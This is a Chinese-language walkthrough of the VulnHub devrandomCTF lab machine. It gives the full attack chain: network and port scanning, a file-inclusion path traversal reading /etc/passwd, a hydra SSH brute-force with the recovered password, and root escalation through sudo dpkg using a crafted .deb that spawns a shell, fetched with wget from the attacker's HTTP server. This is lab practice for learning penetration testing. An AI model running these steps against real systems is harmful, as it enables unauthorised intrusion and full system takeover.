vulnhub之devrandomCTF的实践

今天实践的是vulnhub的devrandomCTF镜像，

下载地址，https://download.vulnhub.com/devrandomctf/devrandomCTF-v1.1.ova，

无法用workstation导入，用virtualbox导入成功，

做地址扫描，sudo netdiscover -r 192.168.0.0/24，

获取到靶机地址192.168.0.188，

继续进行端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.188，

有web服务，并且web服务有个/?include=info的url，

猜测此处有文件包含漏洞，验证一下，浏览器访问，

http://192.168.0.188/?include=../../../../../../../../../etc/passwd，

获取到一个账户，trevor，

用hydra对这个账户进行密码暴力破解，

hydra -l trevor -P /usr/share/wordlists/rockyou.txt 192.168.0.188 ssh，

获取到密码qwertyuiop[]，

ssh登录，ssh trevor@192.168.0.188，

不是root，需要提权，

sudo -l确认到dpkg有root权限，

去GTFOBins搜漏洞利用方法，

kali攻击机上安装fpm，sudo gem install fpm，

TF=$(mktemp -d)

echo 'exec /bin/sh' > $TF/x.sh

fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

生成了x_1.0_all.deb，

kali攻击机上开个http下载服务，python2 -m SimpleHTTPServer，

在靶机上进入临时可写目录，cd /tmp，

下载文件，wget http://192.168.0.190:8000/x_1.0_all.deb，

执行，sudo dpkg -i x_1.0_all.deb，获取到新shell，id确认是root，